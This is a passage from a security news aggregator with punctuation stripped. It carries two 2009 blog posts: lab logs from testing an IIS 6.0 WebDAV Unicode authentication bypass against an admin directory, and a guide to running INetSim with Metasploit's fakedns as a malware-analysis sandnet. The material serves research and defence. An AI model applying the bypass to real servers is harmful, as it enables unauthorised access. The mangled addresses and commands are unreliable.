Microsoft-IIS 60 Content-Type text plain Content-Length 7 ETag ffbac9af6d7c91 1e1 Last-Modified Mon, 18 May 2009 20 20 09 GMT Accept-Ranges bytes pwnage Telnet success 2009-05-19 04 42 20 W3SVC1 19216843128 GET admin testtxt - 80 - 192168431 - 200 0 0 Metasploit finding the protected admin dir 2009-05-19 04 33 12 W3SVC1 19216843128 PROPFIND admin - 80 - 192168431 - 401 2 2148074254 2009-05-19 04 33 13 W3SVC1 19216843128 PROPFIND admin - 80 - 192168431 - 207 0 0 As you can see in the successful telnet log entry above, the pourcentsc0pourcentsaf is removed I suspect the issue is due to how the WebDAV DLL is handling the request and that the logging occurs after the request is handle It would make sense since the log has to accurately reflect the proper HTTP code In this case, the vulnerable WebDAV function removes the Unicode, responds with the requested file and IIS then logs the request That's all I've got for now It's nearing 2am and I'm starting to wane Yeah, can't sleep so, here's some logs on an Apache server from a Nessus scan with the new plugin I'll test it against an IIS server in the morning - - 19 May 2009 02 04 48 -0400 GET HTTP 10 200 45 - - - - 19 May 2009 02 04 49 -0400 GET HTTP 10 200 45 - - - - 19 May 2009 02 04 53 -0400 GET HTTP 11 200 45 - - - - 19 May 2009 02 04 53 -0400 GET HTTP 11 200 45 - - - - 19 May 2009 02 04 53 -0400 GET HTTP 11 200 45 - Mozilla 40 compatible MSIE 60 Windows NT 50 - - 19 May 2009 02 04 53 -0400 GET loginhtm HTTP 11 404 328 - Mozilla 40 compatible MSIE 60 Windows NT 50 - - 19 May 2009 02 04 53 -0400 GET intruvert jsp admin Loginjsp HTTP 11 404 348 - Mozilla 40 compatible MSIE 60 Windows NT 50 - - 19 May 2009 02 04 53 -0400 GET HTTP 11 200 45 - Mozilla 40 compatible MSIE 60 Windows NT 50 - - 19 May 2009 02 04 53 -0400 GET HTTP 11 200 45 - Mozilla 475 en X11 U Nessus - - 19 May 2009 02 04 53 -0400 GET HTTP 11 200 45 - Mozilla 40 compatible MSIE 60 Windows NT 50 - - 19 May 2009 02 04 53 -0400 GET HTTP 11 200 45 - Mozilla 40 compatible MSIE 60 Windows NT 50 - - 19 May 2009 02 04 53 -0400 GET ControlManager defaulthtm HTTP 11 404 345 - Mozilla 40 compatible MSIE 60 Windows NT 50 - - 19 May 2009 02 04 53 -0400 GET MSWSMTP Common Authentication Logonaspx HTTP 11 404 359 - Mozilla 40 compatible MSIE 60 Windows NT 50 - - 19 May 2009 02 04 53 -0400 GET HTTP 11 200 45 - Mozilla 40 compatible MSIE 60 Windows NT 50 - - 19 May 2009 02 04 53 -0400 GET HTTP 11 200 45 - Mozilla 40 compatible MSIE 60 Windows NT 50 - - 19 May 2009 02 04 53 -0400 GET commoncgi servlet CCGIServlet ApHost PDT_InterScan_NT CGIAlias PDT_InterScan_NT File logouthtm HTTP 11 404 348 - Mozilla 40 compatible MSIE 60 Windows NT 50 - - 19 May 2009 02 04 53 -0400 GET HTTP 11 200 45 - Mozilla 40 compatible MSIE 60 Windows NT 50 - - 19 May 2009 02 04 53 -0400 GET oGR_FLrEIIM_html HTTP 11 404 336 - Mozilla 40 compatible MSIE 60 Windows NT 50 - - 19 May 2009 02 04 53 -0400 GET oGR_FLrEIIM_cgi HTTP 11 404 335 - Mozilla 40 compatible MSIE 60 Windows NT 50 - - 19 May 2009 02 04 53 -0400 GET oGR_FLrEIIM_sh HTTP 11 404 334 - Mozilla 40 compatible MSIE 60 Windows NT 50 - - 19 May 2009 02 04 53 -0400 GET oGR_FLrEIIM_pl HTTP 11 404 334 - Mozilla 40 compatible MSIE 60 Windows NT 50 - - 19 May 2009 02 04 53 -0400 GET oGR_FLrEIIM_inc HTTP 11 404 335 - Mozilla 40 compatible MSIE 60 Windows NT 50 - - 19 May 2009 02 04 53 -0400 GET oGR_FLrEIIM_shtml HTTP 11 404 337 - Mozilla 40 compatible MSIE 60 Windows NT 50 - - 19 May 2009 02 04 53 -0400 GET oGR_FLrEIIM_asp HTTP 11 404 335 - Mozilla 40 compatible MSIE 60 Windows NT 50 - - 19 May 2009 02 04 53 -0400 GET oGR_FLrEIIM_php HTTP 11 404 335 - Mozilla 40 compatible MSIE 60 Windows NT 50 - - 19 May 2009 02 04 53 -0400 GET oGR_FLrEIIM_php3 HTTP 11 404 336 - Mozilla 40 compatible MSIE 60 Windows NT 50 - - 19 May 2009 02 04 53 -0400 GET oGR_FLrEIIM_cfm HTTP 11 404 335 - Mozilla 40 compatible MSIE 60 Windows NT 50 - - 19 May 2009 02 04 53 -0400 GET cgi-bin oGR_FLrEIIM_html HTTP 11 404 344 - Mozilla 40 compatible MSIE 60 Windows NT 50 - - 19 May 2009 02 04 53 -0400 GET cgi-bin oGR_FLrEIIM_cgi HTTP 11 404 343 - Mozilla 40 compatible MSIE 60 Windows NT 50 - - 19 May 2009 02 04 53 -0400 GET cgi-bin oGR_FLrEIIM_sh HTTP 11 404 342 - Mozilla 40 compatible MSIE 60 Windows NT 50 - - 19 May 2009 02 04 53 -0400 GET cgi-bin oGR_FLrEIIM_pl HTTP 11 404 342 - Mozilla 40 compatible MSIE 60 Windows NT 50 - - 19 May 2009 02 04 53 -0400 GET cgi-bin oGR_FLrEIIM_inc HTTP 11 404 343 - Mozilla 40 compatible MSIE 60 Windows NT 50 - - 19 May 2009 02 04 53 -0400 GET cgi-bin oGR_FLrEIIM_shtml HTTP 11 404 345 - Mozilla 40 compatible MSIE 60 Windows NT 50 - - 19 May 2009 02 04 53 -0400 GET cgi-bin oGR_FLrEIIM_php HTTP 11 404 343 - Mozilla 40 compatible MSIE 60 Windows NT 50 - - 19 May 2009 02 04 53 -0400 GET cgi-bin oGR_FLrEIIM_php3 HTTP 11 404 344 - Mozilla 40 compatible MSIE 60 Windows NT 50 - - 19 May 2009 02 04 53 -0400 GET cgi-bin oGR_FLrEIIM_cfm HTTP 11 404 343 - Mozilla 40 compatible MSIE 60 Windows NT 50 - - 19 May 2009 02 04 53 -0400 GET HTTP 11 200 45 - Mozilla 40 compatible MSIE 60 Windows NT 50 - - 19 May 2009 02 04 53 -0400 OPTIONS HTTP 11 200 - - Mozilla 40 compatible MSIE 60 Windows NT 50 IMAGE http://www.secuobs.com/revue/news/157753.shtmlhttp://www.secuobs.com/revue/news/157753.shtml Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - I've been looking for something that might work well in a situation where I might want to redirect malicious domains to a an IP hosting numerous faux services I've used the scripts from TRUMAN in the past but they've left a little to be desired no reflection on Joe Stewartthe guy rocks I looked at Glastopf but it wasn't what I was looking for I caught a reference to INetSim and it looked to be exactly what I wanted INetSim emulates about a dozen different services and can do cool things like serve up pretty much any file that is requested For example, if a Zeus bot-infected host is looking for a new cfg file, it will respond with a file Now, it's not the right file, but it doesn't return a 404, either The significant thing here is that it records all requests and can emulate the services well Check the features page for more info Using VMware Fusion 3, I setup a Ubuntu 910 Server for my testing The following apt-get command installed the necessary pre-requisites sudo apt-get install libnet-server-perl libnet-dns-perl libdigest-sha1-perl libiptables-ipv4-ipqueue-perl libipc-shareable-perl I made a few small changes to the config file to fit my environment and was ready to go Running sudo inetsim gets the following INetSim 111 2009-09-09 by Matthias Eckert Thomas Hungenberg Using log directory home jsawyer downloads inetsim-111 log Using data directory home jsawyer downloads inetsim-111 data Using report directory home jsawyer downloads inetsim-111 report Using configuration file home jsawyer downloads inetsim-111 conf inetsimconf Parsing configuration file Configuration file parsed successfully INetSim main process started PID 10323 Session ID is 10323 Real Date Time is Tue Nov 3 22 02 21 2009 Fake Date Time is Tue Nov 3 22 02 21 2009 Delta 0 seconds Forking services dns 53 udp tcp - started PID 10325 http 80 tcp - started PID 10326 pop3 110 tcp - started PID 10328 smtp 25 tcp - started PID 10327 tftp 69 udp - started PID 10329 ntp 123 udp - started PID 10331 time 37 tcp - started PID 10332 ftp 21 tcp - started PID 10330 daytime 13 tcp - started PID 10334 time 37 udp - started PID 10333 echo 7 tcp - started PID 10336 echo 7 udp - started PID 10337 daytime 13 udp - started PID 10335 discard 9 tcp - started PID 10338 discard 9 udp - started PID 10339 quotd 17 tcp - started PID 10340 quotd 17 udp - started PID 10341 chargen 19 tcp - started PID 10342 finger 79 tcp - started PID 10344 chargen 19 udp - started PID 10343 syslog 514 udp - started PID 10346 ident 113 tcp - started PID 10345 dummy 1 tcp - started PID 10347 dummy 1 udp - started PID 10348 done Simulation running As you can see, setup is easy Now, how do you get the bad guys to end up at INetSim I mentioned redirection of malicious domains earlier, but from the sandnet perspective, we can do a couple of things The DNS dummy service within INetSim can be configured to return the same IP for all queries by configuring dns_default_ip But, that's too easy Things are more fun when you use the Metasploit Framework We could run msfconsole from either the same host or another host and have it respond to all DNS queries with the address of the host running INetSim First, create a file and call it anything like fakednsrc In fakednsrc, you need the following use auxiliary server fakedns set TARGETHOST 10227212231 set SRVPORT 53 run Then, run Metasploit like this sudo msfconsole -r fakednsrc And, there you go Like I said, you could use the dummy DNS within INetSim but I just felt like scripting it with Metasploit since I'd done a few custom configs lately for wireless hijacking demos While I've got them in front of me, here's an example of the logs of DNS queries against INetSim Report for session '10413' Real start date Tue Nov 3 22 10 15 2009 Simulated start date Tue Nov 3 22 10 15 2009 Time difference on startup none 2009-11-03 at 22 10 44 First simulated date in log file 2009-11-03 at 22 10 44 DNS connection, type A, class IN, requested name wwwbobcom 2009-11-03 at 22 10 51 DNS connection, type A, class IN, requested name wwwb0bcom 2009-11-03 at 22 10 51 Last simulated date in log file I mentioned above that INetSim can answer pretty much any request It responds based on the extension of the file being requested You request a JPG, it give you back a JPG This is all defined in the config I'd recommend changing out the default files for something unique so that a malware author couldn't finger print your host as running INetSim because of the sample files http_fakefile txt sampletxt text plain http_fakefile htm samplehtml text html http_fakefile html samplehtml text html http_fakefile php samplehtml text html http_fakefile gif samplegif image gif http_fakefile jpg samplejpg image jpeg http_fakefile jpeg samplejpg image jpeg http_fakefile png samplepng image png http_fakefile bmp samplebmp image x-ms-bmp http_fakefile ico faviconico image x-icon http_fakefile exe sample_guiexe x-msdos-program http_fakefile com sample_guiexe x-msdos-program Here's a couple of requests via curl showing that a JPG is being served up no matter the path requested jsawyer curl -s http 10227212231 sukjpg hexdump -C head -1 00000000 ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 JFIFH jsawyer curl -s http 10227212231 OMG longURL whereisitgoing sukeyakejpg hexdump -C head -1 00000000 ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 JFIFH Have fun IMAGE http://www.secuobs.com/revue/news/157752.shtmlhttp://www.secuobs.com/revue/news/157752.shtml